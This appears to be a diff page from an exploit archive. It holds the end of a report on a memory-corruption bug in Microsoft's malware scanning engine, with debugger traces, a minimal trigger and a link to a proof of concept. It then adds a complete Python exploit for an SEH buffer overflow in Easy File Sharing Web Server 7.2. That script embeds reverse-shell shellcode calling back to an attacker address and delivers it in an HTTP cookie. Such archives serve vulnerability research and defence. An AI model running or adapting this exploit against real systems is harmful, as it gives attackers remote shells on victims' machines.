0192f4c8 66881b5f 00004039 0192f7dc 00000030 mpengine!_rsignal+0x76e
|
||||
0192f4f0 66881a1e 0192f7dc 00000030 94740bfe mpengine!_rsignal+0x20f
|
||||
0192f6f8 66881987 0192f7dc 00000030 0192f758 mpengine!_rsignal+0xce
|
||||
0192f708 71436eff 003d5c60 00004039 0192f7dc mpengine!_rsignal+0x37
|
||||
0192f758 7061480b 003d5bf8 00004039 0192f7dc mpsvc!rsignal_wrapper+0xef (FPO: [Non-Fpo])
|
||||
0192f784 706478b4 0192f7dc 0192f828 00000000 mprtp!RealtimeProtection::CCMEngine::NotifyChange+0x7e (FPO: [1,2,0])
|
||||
0192f7a0 70647b53 9479983c 00000004 70647900 mprtp!RealtimeProtection::MpNotifyChangeEx+0x9a (FPO: [Non-Fpo])
|
||||
0192f870 70646b0a 01dfa2a8 01dda8b8 01dfa2a8 mprtp!RealtimeProtection::MpOpenProcessNotificationWorker+0x253 (FPO: [Non-Fpo])
|
||||
0192f888 70649aec 70649ab0 01dda8b0 0192f8ac mprtp!RealtimeProtection::AsyncNotificationWorker+0x86 (FPO: [Non-Fpo])
|
||||
0192f898 70617e47 005209e8 70617dd0 947998e0 mprtp!RealtimeProtection::CAsyncNotificationWorkItem::ExecuteJob+0x3c (FPO: [0,1,4])
|
||||
0192f8ac 73f3389a 01dda8b8 947c55e2 76f7268c mprtp!CommonUtil::CMpThreadPoolItemBase::DoAction+0x77 (FPO: [Non-Fpo])
|
||||
0192f8e8 76f126d5 0192f948 0051c2b8 003a0c00 mpclient!CommonUtil::CMpThreadPoolProviderVista::WorkCallback+0xca (FPO: [Non-Fpo])
|
||||
0192f90c 76f30774 0192f948 003a0c60 77749e94 ntdll!TppWorkpExecuteCallback+0x10f (FPO: [Non-Fpo])
|
||||
0192fa5c 75f1ef8c 003a4e58 0192faa8 76f6367a ntdll!TppWorkerThread+0x562 (FPO: [Non-Fpo])
|
||||
0192fa68 76f6367a 003a4e58 77749e60 00000000 kernel32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
|
||||
0192faa8 76f6364d 76f302cb 003a4e58 00000000 ntdll!__RtlUserThreadStart+0x70 (FPO: [Non-Fpo])
|
||||
0192fac0 00000000 76f302cb 003a4e58 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
|
||||
2: kd> lmv m mpengine
|
||||
start end module name
|
||||
66620000 67015000 mpengine (export symbols) mpengine.dll
|
||||
Loaded symbol image file: mpengine.dll
|
||||
Image path: c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{CCD47945-D7B4-402F-99F0-622F76161ECD}\mpengine.dll
|
||||
Image name: mpengine.dll
|
||||
Timestamp: Tue May 23 10:52:27 2017 (592476DB)
|
||||
CheckSum: 00A1867D
|
||||
ImageSize: 009F5000
|
||||
Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4
|
||||
|
||||
################################################################################
|
||||
|
||||
I had some time to minimize the bug, a minimal testcase would be this:
|
||||
|
||||
MpApiCall("NTDLL.DLL", "VFS_Write", 1, Buf, 0, 0xffffffff, 0);
|
||||
MpApiCall("NTDLL.DLL", "VFS_Write", 1, Buf, 0x7ff, 0x41414141, 0);
|
||||
|
||||
The first call extends the length of the file to nOffset, but because the numberOfBytes parameter is 0 no space is allocated. Then you can read and write arbitrary data to an arbitrary offset to the MutableByteStream object buffer. This is a very powerful exploit primitive, and exploitation does not seem difficult.
|
||||
|
||||
################################################################################
|
||||
|
||||
Here is a better testcase that crashes in a memcpy to a bad destination offset.
|
||||
|
||||
(gdb) r
|
||||
Starting program: mpclient testcase.exe
|
||||
main(): Scanning testcase.exe...
|
||||
EngineScanCallback(): Scanning input
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0xf6e98c08 in ?? ()
|
||||
(gdb) x/i $pc
|
||||
=> 0xf6e98c08: rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
|
||||
(gdb) p/x $edi
|
||||
$1 = 0xc7028a20
|
||||
(gdb) p/x $esi
|
||||
$2 = 0x843e228
|
||||
(gdb) x/10xb $esi
|
||||
0x843e228: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
|
||||
0x843e230: 0x00 0x00
|
||||
(gdb) x/10xb $edi
|
||||
0xc7028a20: Cannot access memory at address 0xc7028a20
|
||||
(gdb) r
|
||||
|
||||
################################################################################
|
||||
|
||||
stacktrace on windows:
|
||||
|
||||
2: kd> r
|
||||
eax=c7c13828 ebx=1ca71d90 ecx=00000400 edx=00001000 esi=1ca71d90 edi=db6625b8
|
||||
eip=669c44e0 esp=0242c210 ebp=0242c234 iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
mpengine!memcpy+0x250:
|
||||
001b:669c44e0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
|
||||
2: kd> dd edi
|
||||
db6625b8 ???????? ???????? ???????? ????????
|
||||
db6625c8 ???????? ???????? ???????? ????????
|
||||
db6625d8 ???????? ???????? ???????? ????????
|
||||
db6625e8 ???????? ???????? ???????? ????????
|
||||
db6625f8 ???????? ???????? ???????? ????????
|
||||
db662608 ???????? ???????? ???????? ????????
|
||||
db662618 ???????? ???????? ???????? ????????
|
||||
db662628 ???????? ???????? ???????? ????????
|
||||
2: kd> kv
|
||||
ChildEBP RetAddr Args to Child
|
||||
0242c214 66a84a47 db6625b8 1ca71d90 00001000 mpengine!memcpy+0x250 (FPO: [3,0,2])
|
||||
0242c234 66d73203 1ca71d90 00001000 00001000 mpengine!std::list<std::pair<wchar_t const * const,CommonUtil::AutoRefWrapper<AttributeValueStore> >,std::allocator<std::pair<wchar_t const * const,CommonUtil::AutoRefWrapper<AttributeValueStore> > > >::erase+0x72 (FPO: [Non-Fpo])
|
||||
0242c258 66d732b9 1ca76db8 00001000 41414000 mpengine!Modification::read+0x79 (FPO: [Non-Fpo])
|
||||
0242c2a0 66d736db 1ca76db8 00001000 41414000 mpengine!MutableStore::MutableByteStream::read+0xa3 (FPO: [Non-Fpo])
|
||||
0242c2dc 66d737db 02f923e4 000007ff 41414141 mpengine!MutableStore::MutableByteStream::write+0xa0 (FPO: [Non-Fpo])
|
||||
0242c320 66d6dfbb 00000544 02f923e4 000007ff mpengine!MutableStore::writeStrm+0xab (FPO: [Non-Fpo])
|
||||
0242c35c 66d6b463 00000596 02f923e4 000007ff mpengine!VirtualFS::write+0x79 (FPO: [4,5,4])
|
||||
0242c3a0 66c1eea8 02f923e4 000007ff 41414141 mpengine!VFS_Write+0x34 (FPO: [Non-Fpo])
|
||||
0242c410 66b71e01 02ed0020 02f20610 fdeee3e7 mpengine!NTDLL_DLL_VFS_Write+0x78 (FPO: [Non-Fpo])
|
||||
0242c440 66d840da 02f203a8 0309877f 02f20601 mpengine!__call_api_by_crc+0x114 (FPO: [Non-Fpo])
|
||||
0242c468 030987a8 669eeca2 02f203a8 0309877f mpengine!x32_parseint+0x1ba (FPO: [Non-Fpo])
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42264.zip
|
||||
91
platforms/windows/remote/42261.py
Executable file
91
platforms/windows/remote/42261.py
Executable file
|
|
@ -0,0 +1,91 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP Request (PassWD) Buffer Overflow (SEH)
|
||||
# Date: 19 June 2017
|
||||
# Exploit Author: clubjk
|
||||
# Author Contact: jk@jkcybersecurity.com
|
||||
# Vendor Homepage: http://www.sharing-file.com
|
||||
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
|
||||
# Version: Easy File Sharing Web Server 7.2
|
||||
# Tested on: WinXP SP3
|
||||
# Usage: ./exploit.py
|
||||
# [*] Connecting to Target 192.168.188.132...standby...
|
||||
# [*] Successfully connected to 192.168.188.132...
|
||||
# [*] Sending improperly formed request...
|
||||
# [!] Request has been sent!
|
||||
|
||||
|
||||
import socket,os,time, sys
|
||||
|
||||
host = "192.168.188.132"
|
||||
port = 80
|
||||
|
||||
|
||||
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.188.133 LPORT=2345 -f py -b "\x00"
|
||||
buf = ""
|
||||
buf += "\xdb\xd2\xd9\x74\x24\xf4\x5f\xba\xb7\xe7\x7d\x1e\x29"
|
||||
buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x57\x13\x03\xe0\xf4\x9f"
|
||||
buf += "\xeb\xf2\x13\xdd\x14\x0a\xe4\x82\x9d\xef\xd5\x82\xfa"
|
||||
buf += "\x64\x45\x33\x88\x28\x6a\xb8\xdc\xd8\xf9\xcc\xc8\xef"
|
||||
buf += "\x4a\x7a\x2f\xde\x4b\xd7\x13\x41\xc8\x2a\x40\xa1\xf1"
|
||||
buf += "\xe4\x95\xa0\x36\x18\x57\xf0\xef\x56\xca\xe4\x84\x23"
|
||||
buf += "\xd7\x8f\xd7\xa2\x5f\x6c\xaf\xc5\x4e\x23\xbb\x9f\x50"
|
||||
buf += "\xc2\x68\x94\xd8\xdc\x6d\x91\x93\x57\x45\x6d\x22\xb1"
|
||||
buf += "\x97\x8e\x89\xfc\x17\x7d\xd3\x39\x9f\x9e\xa6\x33\xe3"
|
||||
buf += "\x23\xb1\x80\x99\xff\x34\x12\x39\x8b\xef\xfe\xbb\x58"
|
||||
buf += "\x69\x75\xb7\x15\xfd\xd1\xd4\xa8\xd2\x6a\xe0\x21\xd5"
|
||||
buf += "\xbc\x60\x71\xf2\x18\x28\x21\x9b\x39\x94\x84\xa4\x59"
|
||||
buf += "\x77\x78\x01\x12\x9a\x6d\x38\x79\xf3\x42\x71\x81\x03"
|
||||
buf += "\xcd\x02\xf2\x31\x52\xb9\x9c\x79\x1b\x67\x5b\x7d\x36"
|
||||
buf += "\xdf\xf3\x80\xb9\x20\xda\x46\xed\x70\x74\x6e\x8e\x1a"
|
||||
buf += "\x84\x8f\x5b\x8c\xd4\x3f\x34\x6d\x84\xff\xe4\x05\xce"
|
||||
buf += "\x0f\xda\x36\xf1\xc5\x73\xdc\x08\x8e\xbb\x89\xae\xcb"
|
||||
buf += "\x54\xc8\xce\xda\x8d\x45\x28\xb6\xdd\x03\xe3\x2f\x47"
|
||||
buf += "\x0e\x7f\xd1\x88\x84\xfa\xd1\x03\x2b\xfb\x9c\xe3\x46"
|
||||
buf += "\xef\x49\x04\x1d\x4d\xdf\x1b\x8b\xf9\x83\x8e\x50\xf9"
|
||||
buf += "\xca\xb2\xce\xae\x9b\x05\x07\x3a\x36\x3f\xb1\x58\xcb"
|
||||
buf += "\xd9\xfa\xd8\x10\x1a\x04\xe1\xd5\x26\x22\xf1\x23\xa6"
|
||||
buf += "\x6e\xa5\xfb\xf1\x38\x13\xba\xab\x8a\xcd\x14\x07\x45"
|
||||
buf += "\x99\xe1\x6b\x56\xdf\xed\xa1\x20\x3f\x5f\x1c\x75\x40"
|
||||
buf += "\x50\xc8\x71\x39\x8c\x68\x7d\x90\x14\x98\x34\xb8\x3d"
|
||||
buf += "\x31\x91\x29\x7c\x5c\x22\x84\x43\x59\xa1\x2c\x3c\x9e"
|
||||
buf += "\xb9\x45\x39\xda\x7d\xb6\x33\x73\xe8\xb8\xe0\x74\x39"
|
||||
|
||||
crash = "/.:/" #unusual but needed
|
||||
crash += "A"*53 #offset
|
||||
crash += "\xeb\x10\x90\x90" #seh
|
||||
crash += "\x05\x86\x01\x10" #pop pop ret ImageLoad.dll (WinXP SP3)
|
||||
crash += "D"*10 #junk
|
||||
crash += buf #shellcode
|
||||
crash += "E"*2600 #total string needs to be about 3000 chars
|
||||
|
||||
|
||||
request = "GET /vfolder.ghp HTTP/1.1\r\n"
|
||||
request += "Host: " + host + "\r\n"
|
||||
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
|
||||
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
|
||||
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
|
||||
request += "Accept-Encoding: gzip, deflate" + "\r\n"
|
||||
request += "Referer: " + "http://" + host + "/" + "\r\n"
|
||||
request += "Cookie: SESSIONID=16246; UserID=PassWD=" + crash + "; frmUserName=; frmUserPass=;"
|
||||
request += " rememberPass=202.197.208.215.201"
|
||||
request += "\r\n"
|
||||
request += "Connection: keep-alive" + "\r\n"
|
||||
request += "If-Modified-Since: Mon, 19 Jun 2017 17:36:03 GMT" + "\r\n"
|
||||
|
||||
print "[*] Connecting to Target " + host + "...standby..."
|
||||
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
||||
|
||||
try:
|
||||
connect=s.connect((host, port))
|
||||
print "[*] Successfully connected to " + host + "!!!"
|
||||
except:
|
||||
print "[!] " + host + " didn't respond\n"
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
print "[*] Sending improperly formed request..."
|
||||
s.send(request + "\r\n\r\n")
|
||||
print "[!] Request has been sent!\n"
|
||||
s.close()
|
||||
Loading…
Add table
Reference in a new issue